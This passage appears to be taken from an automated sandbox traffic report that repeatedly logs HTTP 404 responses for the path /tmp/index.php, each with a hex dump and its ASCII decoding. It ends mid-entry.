<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 07 Oct 2024 22:20:06 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 07 Oct 2024 22:20:07 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 07 Oct 2024 22:20:08 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 07 Oct 2024 22:20:09 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 07 Oct 2024 22:20:11 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 07 Oct 2024 22:20:12 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 07 Oct 2024 22:20:13 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 07 Oct 2024 22:20:14 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 07 Oct 2024 22:20:15 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 07 Oct 2024 22:20:16 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 59 39 08 a5 6c 5f b5 ac 17 bd cf b4 fe 6d 9f 3d d4 a1 72 0a 41 c2 8f 97 cb Data Ascii: #\6Y9l_m=rA
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 07 Oct 2024 22:20:19 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 07 Oct 2024 22:20:19 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 07 Oct 2024 22:20:20 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 07 Oct 2024 22:20:21 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 07 Oct 2024 22:20:22 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE 